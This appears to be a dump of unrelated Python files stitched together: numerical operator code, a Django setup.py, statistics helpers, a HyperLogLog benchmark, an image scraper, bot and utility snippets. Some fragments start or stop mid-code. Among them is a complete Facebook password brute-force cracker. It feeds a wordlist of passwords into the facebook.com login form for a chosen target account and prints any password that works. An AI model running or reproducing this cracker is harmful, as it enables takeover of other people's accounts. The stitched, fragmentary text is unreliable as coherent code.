#return BlockScaledOperator(self, scalars ,shape=self.shape)
return type(self)(*ops, shape=self.shape)
@property
def T(self):
        '''Returns the transpose of the BlockOperator;
        the Operators are re-ordered in a row-by-row fashion.'''
newshape = (self.shape[1], self.shape[0])
oplist = []
for col in range(newshape[1]):
for row in range(newshape[0]):
oplist.append(self.get_item(col,row))
return type(self)(*oplist, shape=newshape)
def domain_geometry(self):
'''returns the domain of the BlockOperator
If the shape of the BlockOperator is (N,1) the domain is a ImageGeometry or AcquisitionGeometry.
Otherwise it is a BlockGeometry.
'''
if self.shape[1] == 1:
# column BlockOperator
return self.get_item(0,0).domain_geometry()
else:
# get the geometries column wise
# we need only the geometries from the first row
# since it is compatible from __init__
tmp = []
for i in range(self.shape[1]):
tmp.append(self.get_item(0,i).domain_geometry())
return BlockGeometry(*tmp)
#shape = (self.shape[0], 1)
#return BlockGeometry(*[el.domain_geometry() for el in self.operators],
# shape=self.shape)
def range_geometry(self):
'''returns the range of the BlockOperator'''
tmp = []
for i in range(self.shape[0]):
tmp.append(self.get_item(i,0).range_geometry())
return BlockGeometry(*tmp)
#shape = (self.shape[1], 1)
#return BlockGeometry(*[el.range_geometry() for el in self.operators],
# shape=shape)
def sum_abs_row(self):
res = []
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
prod = self.get_item(row,col).sum_abs_row()
else:
prod += self.get_item(row,col).sum_abs_row()
res.append(prod)
if self.shape[1]==1:
tmp = sum(res)
return ImageData(tmp)
else:
return BlockDataContainer(*res)
def sum_abs_col(self):
res = []
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
prod = self.get_item(row, col).sum_abs_col()
else:
prod += self.get_item(row, col).sum_abs_col()
res.append(prod)
return BlockDataContainer(*res)
def __len__(self):
return len(self.operators)
def __getitem__(self, index):
        '''returns the index-th operator in the block irrespective of its shape'''
return self.operators[index]
if __name__ == '__main__':
from cil.framework import ImageGeometry
from cil.optimisation.operators import GradientOperator, IdentityOperator, \
SparseFiniteDifferenceOperator, SymmetrisedGradientOperator, ZeroOperator
M, N = 4, 3
ig = ImageGeometry(M, N)
arr = ig.allocate('random_int')
G = GradientOperator(ig)
Id = IdentityOperator(ig)
B = BlockOperator(G, Id)
print(B.sum_abs_row())
#
Gx = SparseFiniteDifferenceOperator(ig, direction=1, bnd_cond='Neumann')
Gy = SparseFiniteDifferenceOperator(ig, direction=0, bnd_cond='Neumann')
d1 = abs(Gx.matrix()).toarray().sum(axis=0)
d2 = abs(Gy.matrix()).toarray().sum(axis=0)
d3 = abs(Id.matrix()).toarray().sum(axis=0)
d_res = numpy.reshape(d1 + d2 + d3, ig.shape, 'F')
print(d_res)
#
z1 = abs(Gx.matrix()).toarray().sum(axis=1)
z2 = abs(Gy.matrix()).toarray().sum(axis=1)
z3 = abs(Id.matrix()).toarray().sum(axis=1)
#
z_res = BlockDataContainer(BlockDataContainer(ImageData(numpy.reshape(z2, ig.shape, 'F')),\
ImageData(numpy.reshape(z1, ig.shape, 'F'))),\
ImageData(numpy.reshape(z3, ig.shape, 'F')))
#
ttt = B.sum_abs_col()
#
#TODO this is not working
# numpy.testing.assert_array_almost_equal(z_res[0][0].as_array(), ttt[0][0].as_array(), decimal=4)
# numpy.testing.assert_array_almost_equal(z_res[0][1].as_array(), ttt[0][1].as_array(), decimal=4)
# numpy.testing.assert_array_almost_equal(z_res[1].as_array(), ttt[1].as_array(), decimal=4)
u = ig.allocate('random_int')
z1 = B.direct(u)
res = B.range_geometry().allocate()
B.direct(u, out = res)
###########################################################################
# Block Operator for TGV reconstruction
M, N = 2,3
ig = ImageGeometry(M, N)
ag = ig
op11 = GradientOperator(ig)
op12 = IdentityOperator(op11.range_geometry())
op22 = SymmetrisedGradientOperator(op11.domain_geometry())
op21 = ZeroOperator(ig, op22.range_geometry())
op31 = IdentityOperator(ig, ag)
op32 = ZeroOperator(op22.domain_geometry(), ag)
operator = BlockOperator(op11, -1*op12, op21, op22, op31, op32, shape=(3,2) )
z1 = operator.domain_geometry()
z2 = operator.range_geometry()
print(z1.shape)
print(z2.shape)
|
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='django-envelope',
version=__import__('envelope').__version__,
description='A contact form app for Django',
long_description=read('README.rst'),
author='Zbigniew Siciarz',
author_email='zbigniew@siciarz.net',
url='http://github.com/zsiciarz/django-envelope',
download_url='http://pypi.python.org/pypi/django-envelope',
license='MIT',
install_requires=['Django>=1.8'],
packages=find_packages(exclude=['example_project', 'tests']),
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Utilities',
],
)
|
import pandas as pd
from scipy.stats import chi2_contingency
import random
def test_chiquadro(dataset, variabile_target, lista_variabili, index):
    """ Given a target variable and a list of independent variables, compute the
    chi-squared test between the target and every variable of interest and collect
    the relevant statistics in a dataframe.
    Requires the scipy and pandas libraries.
    --------------------------
    Parameters:
    dataset: the reference dataset
    variabile_target: the response variable
    lista_variabili: list of the independent variables of interest (a list even if there is only one)
    index: list of labels to assign to each row of the output (i.e. the different variables)
    --------------------------
    Output: dataframe with the chi2 value, the p_value, the degrees of freedom, and
    the significance of the test at the 5% level """
    chi2, p_value, dof, ex = [], [], [], []
    for variabile in lista_variabili:
        # run the test once per variable and unpack all of its statistics
        chi2_test = chi2_contingency(pd.crosstab(variabile_target, variabile))
        chi2.append(chi2_test[0])
        p_value.append(chi2_test[1])
        dof.append(chi2_test[2])
        ex.append(chi2_test[3])
    chi2_dataset = pd.DataFrame(data = {"chi2": chi2,
                                        "p_value": p_value,
                                        "degree of freedom": dof},
                                index = index
                                )
    sign_0 = []
    for i in range(len(chi2_dataset)):
        if chi2_dataset["p_value"][i] < 0.05:
            sign_0.append(True)
        else:
            sign_0.append(False)
    chi2_dataset["sign_0.05"] = sign_0
    return chi2_dataset
def imputazione_proporzionale(dataset, variabile):
    """ Impute the missing values of a variable, assigning each category
    in proportion to how often it occurs in the dataset.
    -------------------
    Parameters:
    dataset: the reference dataset
    variabile: name (string) of the variable whose missing values we want to impute
    --------------------
    Output:
    dataset with the imputed values for the reference variable """
    e = dataset[variabile].dropna().value_counts()/len(dataset[variabile].dropna())*100
    len_index = len(dataset[dataset[variabile].isna()].index)
    for i in range(len(e)):
        print("""{:.2f}% of the observations belong to the category "{}" """.format(e[i], e.index[i]))
    random.seed(42)
    dataset_index = dataset[dataset[variabile].isna()].index
    for categoria, valore in zip(e.index, e):
        idx_Pr = random.sample(list(dataset_index), k = round(valore*len_index/100))
        dataset.loc[idx_Pr] = dataset.fillna({variabile : categoria})
        dataset_index = dataset_index.drop(idx_Pr)
    return dataset
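# A minimal usage sketch on synthetic data (hypothetical example, not from the
# original project): the target and the independent variables are passed as pandas
# Series, and `index` labels the rows of the resulting dataframe.
if __name__ == "__main__":
    df = pd.DataFrame({"target": ["a", "b", "a", "b"] * 25,
                       "x1": ["u", "u", "v", "v"] * 25})
    print(test_chiquadro(df, df["target"], [df["x1"]], index=["x1"]))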
|
import random
import math
from typing import List
import numpy as np
# from hyperLogLogKtob import HyperLogLog
# from registersKtob import registers
from hashSuggested import hash_A
from rhoSuggested import rho
m = 256
N = 500000
sigma = 1.04/math.sqrt(m)
stdv1plus = N*(1+sigma)
stdv1min = N*(1-sigma)
stdv2plus = N*(1+2*sigma)
stdv2min = N*(1-2*sigma)
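# Worked numbers for the bounds above: with m = 256 registers the relative standard
# error is sigma = 1.04 / sqrt(256) ≈ 0.065, so for N = 500000 the one-sigma band is
# roughly [467500, 532500] and the two-sigma band roughly [435000, 565000];
# benchmark() below counts how many runs fall inside each band.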
def f(x):
res = ((x*0xbc164501) & 0x7fffffff) >> 23
return res
A = [0x21ae4036,
0x32435171,
0xac3338cf,
0xea97b40c,
0x0e504b22,
0x9ff9a4ef,
0x111d014d,
0x934f3787,
0x6cd079bf,
0x69db5c31,
0xdf3c28ed,
0x40daf2ad,
0x82a5891c,
0x4659c7b0,
0x73dc0ca8,
0xdad3aca2,
0x00c74c7e,
0x9a2521e2,
0xf38eb6aa,
0x64711ab6,
0x5823150a,
0xd13a3a9a,
0x30a5aa04,
0x0fb9a1da,
0xef785119,
0xc9f0b067,
0x1e7dde42,
0xdda4a7b2,
0x1a1c2640,
0x297c0633,
0x744edb48,
0x19adce93 ]
def inputGenerator(n: int, seed: int) -> List[int]:
list= []
for i in range(0,n):
random.seed(i+seed)
l = random.getrandbits(32)
list.append(l)
return list
results = {'std1': 0, 'std2': 0}
def HyperLogLog():
alfaM = 0.7213/(1 + 1.079/m)
sum = 0
for i in range(0,m):
sum += math.pow(2, -M[i])
n = alfaM * math.pow(m, 2) * (math.pow(sum, -1))
V = 0
pow2 = math.pow(2,32)
for x in M:
if(x==0):
V += 1
if (n <= ((5/2)*m)) and V > 0:
return m*(math.log(m/V))
if (n > (1/30)*pow2):
n = -pow2*(math.log(1-(n/pow2)))
return n
def benchmark():
hyperLog = HyperLogLog()
print(hyperLog)
if (hyperLog <= stdv1plus and hyperLog >= stdv1min):
current = results.get('std1')
current += 1
results['std1'] = current
if (hyperLog <= stdv2plus and hyperLog >= stdv2min and (hyperLog > stdv1plus or hyperLog < stdv1min)):
current = results.get('std2')
current += 1
results['std2'] = current
def registers(x: int):
resF = f(x)
resHash = hash_A(A, x)
resRho = rho(resHash)
if(resRho > M[resF]):
M[resF] = resRho
# print(M[resF])
input = inputGenerator(N, 3)
for i in range(0,10):
M = [0]*m
for val in input:
registers(val)
benchmark()
print(results)
# def write_latex_tabular(ns: List[int],
# res: np.ndarray ,
# filename: str):
# with open(filename ,'w') as f:
# f.write(r'\begin{tabular }{rrr}' + '\n')
# f.write(r'$n$& Average & Standard deviation ')
# f.write(r'\\ \hline' + '\n')
# for i in range(len(ns)):
# fields = [str(ns[i]),
# '{:.6f}'.format(res[i,0]),
# '{:.6f}'.format(res[i,1])]
# f.write('&'.join(fields) + r'\\' + '\n')
# f.write(r'\end{tabular}' + '\n')
|
import urllib.request
import re
import time
import os
# Workflow
# request -> process -> return
# 1. get the index page URLs  2. get the image URLs on each page  3. fetch the image bytes  4. create folders and save
# multi-threaded crawling
class Mzimg(object):
    # fetch the HTML source
    def get_html(self,url):
        headers = {
            'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0'
        }
        # add request headers
        request = urllib.request.Request(url=url,headers=headers)
        try:
            # fetch the page source
            resp = urllib.request.urlopen(request,timeout=10)
            # decode the page with gbk (utf-8 raises errors here), slice the content
            # (the regex would otherwise match unrelated content, so slicing keeps only the region whose URLs we want) and return it
            # after repeated tuning the slice is [6800:-4800]
            result = resp.read().decode('gbk',errors='ignore')[6800:-4800]
            result_lenth = len(result)
            return result,result_lenth
        except:
            print("[-] Request failed, possibly a network problem")
            return False
    # get the index page URLs
    def get_page_url(self,url):
        # fetch the source
        print("[*] Requesting url:%s" %(url))
        try:
            res,res_len = self.get_html(url)
            print("[+] Bytes:%d"%(res_len))
            '''
            f = open('/home/yangfan/Code/Python/_urllib/file_name.txt','w')
            f.write(res)
            f.close()
            '''
            # regex-match the URLs
            list1 = re.findall('https://www.meizitu.com/a/\d{1,5}.html',res)
            page_url_list=[]
            # drop duplicate URLs
            for i in list1:
                if i not in page_url_list:
                    page_url_list.append(i)
            #print(url_list)
            print("[+] url:%s"%(url))
            print("[+] Number of URLs found:%d"%(len(page_url_list)))
            # return all URLs on the page
            return page_url_list
        except:
            print("[-] Request failed")
            return False
    # get all img_url on a page
    def get_img_url(self,page_url):
        print("[*] Requesting url:%s"%(page_url))
        try:
            res,res_len = self.get_html(page_url)
            list1 = re.findall("http://pic.topmeizi.com/wp-content/uploads/\d{4}a/\d{2}/\d{2}/\d{2}.jpg",res)
            #print(list1)
            img_url_list = []
            # drop duplicate URLs
            for i in list1:
                if i not in img_url_list:
                    img_url_list.append(i)
            print("[+] url:%s"%(page_url))
            print("[+] Number of URLs found:%d"%(len(img_url_list)))
            # return all img_url under this page_url
            return img_url_list
        except:
            print("[-] Request failed, possibly a network problem")
            return False
    # fetch img_value (the image bytes)
    def get_img_value(self,img_url):
        print("[*] Requesting url:%s"%(img_url))
        headers = {
            'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0'
        }
        # add request headers
        request = urllib.request.Request(url=img_url,headers=headers)
        # fetch the response
        try:
            resp = urllib.request.urlopen(request,timeout=10)
            print("[+] Request succeeded")
            # print("[]")
            # print(resp.read())
            print("[+] url:%s"%(img_url))
            print("[*] Saving:%s"%(img_url[-18:]))
            return resp.read()
        except:
            print("[-] Request failed")
            return False
    # create the directory path
    def crea_folder(self,path):
        # strip leading and trailing whitespace
        path = path.strip()
        # strip a trailing backslash
        path = path.rstrip("\\")
        # check whether the path already exists
        isExists = os.path.exists(path)
        if not isExists:
            os.makedirs(path)
            print("[+] Path:%s Create Success"%(path))
            # change into the created path
            # os.chdir(path)
            return True
        else:
            print("[+] Path:%s already exists"%(path))
            # os.chdir(path)
            return False
    # save the image bytes to a file
    def save_img(self,img_name,img_value):
        try:
            with open(img_name,'wb+') as f:
                f.write(img_value)
                print("[+] Saved successfully")
            f.close()
        except:
            print("[-] Save failed")
            return False
|
import numpy as np
from src.celosia import Celosia
from multiprocessing import freeze_support
#*************************************************************************
# An illustration example as presented in the following paper:
# Celosia: A Comprehensive Anomaly Detection Framework for Smart Cities
#*************************************************************************
def count_ones(n):
    # count the number of '1's in a number's binary representation.
return bin(n).count('1')
def to_bin_list(n, width):
    # convert a number to a binary list with the specified width
return [int(x) for x in '{:0{size}b}'.format(n,size=width)]
def create_xor_np_array(n):
    '''Create an n-input XOR gate and return inputs and outputs as numpy arrays.'''
N = 2 ** n
li = []
lo = []
for i in range(N):
li.append(to_bin_list(i, n))
o = 0
if (count_ones(i) % 2):
# number of '1's is odd
o = 1
lo.append([o])
inputs = np.array(li)
outputs = np.array(lo)
return (inputs, outputs)
if __name__ == '__main__':
freeze_support()
(inputs, outputs) = create_xor_np_array(8)
config = {
'N':10, # number of different network structures to try
#'view': True, # view the PDF file
}
celosia = Celosia()
celosia.create_optimal_network('8-XOR',inputs, outputs, config)
# https://github.com/alexarnimueller/som/blob/master/som.py
|
import time
import os
os.system('clear')
time.sleep(0.5)
try:
import mechanize
except ModuleNotFoundError:
print '[!] Module >Mechanize< Not Found!\n This module is only available in python 2.x :/\n Please install mechanize (pip install mechanize) and run the program with python2'
exit()
print """
\033[1;92m O
\033[1;92m M
\033[1;92m A
\033[1;96m R
\033[1;96m A
\033[1;96m D
\033[1;91m N
\033[1;91m A
\033[1;91m N
\033[1;93m T
\033[1;93m W
\033[1;93m R
\033[1;96m OMAR ADNAN✔
\033[1;94m FACEBOOK: Omar Adnan
\033[1;93m FACEBOOK PAGE: https://www.facebook.com/play.itnow
"""
CorrectUsername = "OMARADNAN"
CorrectPassword = "SEVENWE"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;92m \x1b[1;93mTOOL USERNAME \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;92m \x1b[1;93mTOOL PASSWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as OMAR ADNAN"
loop = 'false'
os.system('xdg-open https://www.facebook.com/alaminkhan.60')
else:
print "Wrong Password"
os.system('xdg-open https://www.facebook.com/alaminkhan.60')
else:
print "Wrong Username"
os.system('xdg-open https://www.facebook.com/alaminkhan.60')
time.sleep(0.5)
print """
\033[1;92m ___________¶________________________________¶_____________
\033[1;92m ___________¶___¶__________________________¶___¶___________
\033[1;92m ___________¶__¶____________________________¶__¶___________
\033[1;92m __________¶___¶____________________________¶___¶__________
\033[1;92m __________¶__¶¶____________________________¶¶__¶__________
\033[1;92m __________¶__¶______________________________¶__¶__________
\033[1;92m __________¶__¶______________________________¶__¶__________
\033[1;92m _________¶¶__¶______________________________¶__¶¶_________
\033[1;92m _________¶¶__¶______________________________¶__¶¶_________
\033[1;92m _________¶¶__¶______________________________¶__¶¶_________
\033[1;92m ______¶__¶¶__¶______________________________¶__¶¶__¶______
\033[1;92m ______¶__¶¶__¶_____________________________¶¶__¶¶__¶______
\033[1;92m ______¶__¶¶__¶¶____________________________¶¶__¶¶__¶______
\033[1;92m ______¶___¶___¶____________________________¶___¶___¶______
\033[1;92m ______¶¶__¶___¶_________¶________¶_________¶___¶__¶¶______
\033[1;92m _______¶__¶¶__¶¶_______¶__________¶_______¶¶__¶¶__¶_______
\033[1;91m _______¶___¶___¶_______¶__________¶_______¶___¶___¶_______
\033[1;91m _______¶¶__¶¶__¶¶_____¶____________¶_____¶___¶¶__¶¶_______
\033[1;91m _______¶¶_¶¶¶___¶¶____¶____________¶____¶¶___¶¶¶¶¶¶_______
\033[1;91m ________¶¶__¶¶___¶___¶¶____________¶____¶___¶¶__¶¶________
\033[1;91m ________¶____¶_¶__¶__¶______________¶__¶__¶_¶____¶________
\033[1;91m _______¶_¶__¶¶_¶___¶_¶______________¶_¶___¶_¶¶_¶¶_¶_______
\033[1;91m _________¶¶¶¶__¶¶____¶______________¶____¶¶__¶¶¶¶_________
\033[1;91m __________¶¶____¶¶___¶______________¶___¶¶____¶¶__________
\033[1;91m _________¶¶¶¶____¶___¶¶____________¶¶___¶____¶¶¶¶_________
\033[1;91m ________¶__¶¶_____¶¶___¶___¶¶¶¶___¶___¶¶_____¶¶__¶________
\033[1;91m _______¶____¶¶__¶¶_¶¶¶__¶¶_¶¶¶¶_¶¶__¶¶¶_¶¶__¶¶____¶_______
\033[1;91m ______¶______¶¶¶¶___¶¶¶¶¶¶¶¶¶_¶¶¶¶¶¶¶¶___¶_¶¶______¶______
\033[1;91m _____¶_______¶¶¶_____¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_____¶¶¶_______¶_____
\033[1;91m ___________¶¶¶_¶¶__¶¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶¶__¶¶_¶¶____________
\033[1;91m __________¶¶¶_____¶¶___¶___¶¶¶¶___¶___¶¶_____¶¶¶__________
\033[1;91m _________¶¶¶_____¶¶__¶¶__¶¶¶¶¶¶¶¶__¶¶__¶¶_____¶¶¶_________
\033[1;91m __________¶¶____¶¶__¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶__¶____¶¶¶__________
\033[1;91m ___________¶¶¶__¶___¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶___¶__¶¶¶___________
\033[1;91m _____¶_______¶¶_¶___¶¶_¶¶¶¶¶¶¶¶¶¶¶¶_¶¶___¶_¶¶_______¶_____
\033[1;91m ______¶______¶¶¶¶___¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶___¶_¶¶______¶______
\033[1;91m _______¶____¶¶_¶_¶__¶___¶¶¶¶¶¶¶¶¶¶___¶__¶_¶_¶¶____¶_______
\033[1;91m ________¶__¶¶__¶_¶¶_¶_____¶¶¶¶¶¶_____¶_¶¶_¶__¶¶__¶________
\033[1;91m _________¶_¶¶__¶_¶¶_¶_______¶¶_______¶_¶¶_¶__¶¶¶¶_________
\033[1;91m __________¶¶____¶¶__¶¶¶____________¶¶¶__¶¶____¶¶__________
\033[1;91m _________¶¶¶¶_______¶¶______________¶¶_______¶¶¶¶_________
\033[1;91m _______¶_¶__¶¶¶____¶_¶______________¶_¶____¶¶¶_¶¶_¶_______
\033[1;91m ________¶____¶¶___¶__¶______________¶_¶¶___¶¶____¶________
\033[1;91m ________¶¶__¶¶___¶¶__¶¶____________¶¶__¶¶___¶¶__¶¶________
\033[1;91m _______¶¶¶¶¶¶¶__¶¶____¶____________¶____¶¶__¶¶¶¶¶¶¶_______
\033[1;91m _______¶¶__¶¶__¶¶_________________¶______¶¶__¶¶__¶¶_______
\033[1;91m _______¶___¶___¶__________________________¶___¶___¶_______
\033[1;96m _______¶__¶¶__¶¶__________________________¶¶__¶¶__¶_______
\033[1;96m ______¶¶__¶___¶____________________________¶___¶__¶¶______
\033[1;96m ______¶___¶___¶____________________________¶___¶___¶______
\033[1;96m ______¶__¶¶__¶¶____________________________¶¶__¶¶__¶______
\033[1;96m ______¶__¶¶__¶¶____________________________¶¶__¶¶__¶______
\033[1;96m ______¶__¶¶__¶______________________________¶__¶¶__¶______
\033[1;96m _________¶¶__¶______________________________¶__¶¶_________
\033[1;96m _________¶¶__¶______________________________¶__¶¶_________
\033[1;96m _________¶¶__¶______________________________¶__¶¶_________
\033[1;96m __________¶__¶______________________________¶__¶__________
\033[1;96m __________¶__¶______________________________¶__¶__________
\033[1;96m __________¶__¶¶____________________________¶¶__¶__________
\033[1;96m __________¶___¶____________________________¶___¶__________
\033[1;96m _______¶__¶________________________________¶__¶___________
\033[1;96m _______¶__________________________________¶___¶___________
\033[1;96m ____________¶________________________________¶____________
\033[1;93m ____________¶________________________________¶____________
\033[1;91m____ ____ ___ ____ _____ ____ __ __ _ _ _
\033[1;92m/ ___|| _ \_ _| _ \| ____| _ \ | \/ | / \ | \ | |
\033[1;91m\___ \| |_) | || | | | _| | |_) | | |\/| | / _ \ | \| |
\033[1;94m ___) | __/| || |_| | |___| _ < | | | |/ ___ \| |\ |
\033[1;92m|____/|_| |___|____/|_____|_| \_\ |_| |_/_/ \_\_| \_|
\033[1;93m AUTHOR: HAUNTERBOY ALAMIN✔
\033[1;94m FACEBOOK: MD ALAMIN KHAN
\033[1;93m FACEBOOK: PAGE:https://www.facebook.com/alaminkhan.60
"""
user = raw_input('[✪] Facebook Target Username/ID/Email ::: ')
time.sleep(0.8)
wrdlstFileName = raw_input('\n[⊕] Wordlist Type (file.txt) ::: ')
try:
wordlist = open(wrdlstFileName, 'r')
except FileNotFoundError:
print ('\n[!] File Not Found!')
exit()
print """
\033[1;94m ───────────▄▄▄▄▄▄▄▄▄───────────
\033[1;94m ────────▄█████████████▄────────
\033[1;94m █████──█████████████████──█████
\033[1;94m ▐████▌─▀███▄───────▄███▀─▐████▌
\033[1;94m ─█████▄──▀███▄───▄███▀──▄█████─
\033[1;94m ─▐██▀███▄──▀███▄███▀──▄███▀██▌─
\033[1;94m ──███▄▀███▄──▀███▀──▄███▀▄███──
\033[1;91m ──▐█▄▀█▄▀███─▄─▀─▄─███▀▄█▀▄█▌──
\033[1;91m ───███▄▀█▄██─██▄██─██▄█▀▄███───
\033[1;91m ────▀███▄▀██─█████─██▀▄███▀────
\033[1;91m ───█▄─▀█████─█████─█████▀─▄█───
\033[1;91m ───███────────███────────███───
\033[1;91m ───███▄────▄█─███─█▄────▄███───
\033[1;91m ───█████─▄███─███─███▄─█████───
\033[1;91m ───█████─████─███─████─█████───
\033[1;92m ───█████─████─███─████─█████───
\033[1;92m ───█████─████─███─████─█████───
\033[1;92m ───█████─████▄▄▄▄▄████─█████───
\033[1;92m ────▀███─█████████████─███▀────
\033[1;92m ──────▀█─███─▄▄▄▄▄─███─█▀──────
\033[1;92m ─────────▀█▌▐█████▌▐█▀─────────
\033[1;92m ────────────███████────────────
\033[1;94m +===============================================+
\033[1;92m |............. Facebook HACKER .............|
\033[1;92m +-----------------------------------------------+
\033[1;92m | #Author: HAUNTERBOY ALAMIN |
\033[1;91m | Version 3.0 |
\033[1;92m | https://www.facebook.com/play.itnow |
\033[1;91m +===============================================+
\033[1;96m |.............. fb-Terget ...............|
+-----------------------------------------------+\n\n
"""
time.sleep(0.8)
print '\n\nCracking '+user+' Now...'
time.sleep(1)
print '\nIM NOT RESPONSIBLE FOR ANY MISS USE HAUNTERBOY ALAMIN\n'
for password in wordlist:
if password == '' or password == ' ':
pass
else:
try:
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent', "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]
fb = browser.open('https://facebook.com')
dos = open('Facebook-Log.txt', 'w+')
browser.select_form(nr=0)
browser.form['email'] = user
browser.form['pass'] = password
browser.method = 'POST'
browser.submit()
dos.write(browser.open('https://facebook.com').read())
dos.seek(0)
text = dos.read().decode('UTF-8')
if text.find('home_icon', 0, len(text)) != -1:
print '\033[1;96m[✔] Password Found >>>>➤ '+password
dos.close()
os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
exit()
else:
print "\033[1;96m[✘] Wrong Password >>>➤ "+str(password)
except KeyboardInterrupt:
print '\n#############################################\n Exiting..'
dos.close()
os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
exit()
time.sleep(1)
print 'Sorry, none of the passswords in your wordlist is right.'
time.sleep(0.8)
dos.close()
os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
exit()
|
# A script meant to be run by the Heroku scheduler:
# it is written as a base management command, so Heroku can run it periodically just as if it were run from the console.
from django.core.management.base import BaseCommand
from pm_lookup.processing.scheduled_processing import save_history_pm
from pm_lookup.processing.scheduled_processing_2 import arrange_time_series_and_graphs
# Running
# python manage.py save_current_pm_values_in_history
# invokes the command automatically.
class Command(BaseCommand):
    def handle(self, *args, **options):
        # save the current values into the hourly history model
        save_history_pm()
        # build the hourly time series and graphs from the hourly history model
        arrange_time_series_and_graphs()
|
# command definitions
START_FOC = (0x03)
ACC_MODE_NORMAL = (0x11)
GYR_MODE_NORMAL = (0x15)
FIFO_FLUSH = (0xB0)
INT_RESET = (0xB1)
STEP_CNT_CLR = (0xB2)
SOFT_RESET = (0xB6)
|
from .command import Command
from datetime import timedelta, datetime
import traceback
import asyncio
class Task:
def __init__(self, callback, delta=True, **units):
self.delta = delta
self.callback = callback
self.units = units
self.module = None # Gets filled by bot.add_module
@property
def time_to_wait(self):
if self.delta:
return timedelta(**self.units).total_seconds()
now = datetime.utcnow()
time = datetime.utcnow().replace(
hour=self.units.get("hour", 0),
minute=self.units.get("minute", 0),
second=self.units.get("seconds", 0),
microsecond=0
)
wait = time - now
if wait.total_seconds() < 0:
wait += timedelta(days=1)
return wait.total_seconds()
def construct(self):
async def coro():
while True:
await asyncio.sleep(self.time_to_wait)
try:
await self.callback(self.module)
except:
traceback.print_exc()
return coro()
class Listener:
def __init__(self, callback, name=None):
name = name or callback.__name__
if name.startswith("on_"):
name = name[3:]
self.module = None # Gets filled by bot.add_module
self.name = name
self.callback = callback
async def execute(self, *args, **kwargs):
if self.module is None:
await self.callback(*args, **kwargs)
else:
await self.callback(self.module, *args, **kwargs)
class Module:
def __init__(self, client):
self.client = client
self.bot = client
@property
def commands(self):
for name in dir(self):
attr = getattr(self, name)
# attr.parent is None checks if it is a subcommand
if isinstance(attr, Command) and attr.parent is None:
yield attr
@property
def listeners(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Listener):
yield attr
@property
def tasks(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Task):
yield attr
@staticmethod
def command(*args, **kwargs):
def _predicate(callback):
return Command(callback, *args, **kwargs)
return _predicate
@staticmethod
def listener(*args, **kwargs):
def _predicate(callback):
return Listener(callback, *args, **kwargs)
return _predicate
@staticmethod
def task(*args, **kwargs):
def _predicate(callback):
return Task(callback, *args, **kwargs)
return _predicate
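# A minimal usage sketch (hypothetical module; the decorators below only register
# a Task and a Listener, the surrounding bot framework is what actually runs them):
class ExampleModule(Module):
    @Module.task(minutes=30)
    async def refresh(self):
        # runs every 30 minutes once the bot schedules the task
        print("refreshing cached data")

    @Module.listener()
    async def on_message(self, message):
        # listens for the "message" event (the "on_" prefix is stripped)
        print("received:", message)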
|
# Please also refer to other files in student_contributed for more tests
class a(object):
a: a = None # members can have the same name as class
A: a = None
B: [b] = None
class b(object):
def b(self:b, other:a): # methods can have same name as class
A.a = other # assign to member doesn't need global decl
B[1] = None # nor does assign to array element
self.b(other.a)
len(42.__init__().__init__()).__init__() # some crazy use of __init__
|
'''
each row of created .csv file is of the form:
polarity, id, date, query, user, comment, test_or_training
'''
import csv
import os
parent_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
train_file_name = os.path.join(parent_path, 'data', 'raw_data', 'training.csv')
training = []
with open(train_file_name, 'rt', encoding='ISO-8859-1') as f:
reader = csv.reader(f)
training = list(reader)
test_file_name = os.path.join(parent_path, 'data', 'raw_data', 'test.csv')
test = []
with open(test_file_name, 'rt', encoding='ISO-8859-1') as f:
reader = csv.reader(f)
test = list(reader)
out_file_name = os.path.join(parent_path, 'data', 'intermediate', 'all_data.csv')
with open(out_file_name, 'w') as f:
writer = csv.writer(f)
for row in training:
row.append('training')
writer.writerow(row)
for row in test:
row.append('test')
writer.writerow(row)
|
from typing import List
class NumArray:
def __init__(self, nums: List[int]):
self.sum_till = [0] * (len(nums) + 1)
for index, number in enumerate(nums):
self.sum_till[index + 1] = self.sum_till[index] + number
def sumRange(self, left: int, right: int) -> int:
return self.sum_till[right + 1] - self.sum_till[left]
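# Quick check of the prefix-sum range queries (classic LeetCode 303 example values):
if __name__ == "__main__":
    arr = NumArray([-2, 0, 3, -5, 2, -1])
    print(arr.sumRange(0, 2))  # expected 1
    print(arr.sumRange(2, 5))  # expected -1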
|
import cv2
import mediapipe as mp
mp_drawing = mp.solutions.drawing_utils
mp_hands = mp.solutions.hands
# For webcam input:
cap = cv2.VideoCapture(0)
with mp_hands.Hands(
min_detection_confidence=0.5,
min_tracking_confidence=0.5,
max_num_hands=1) as hands:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
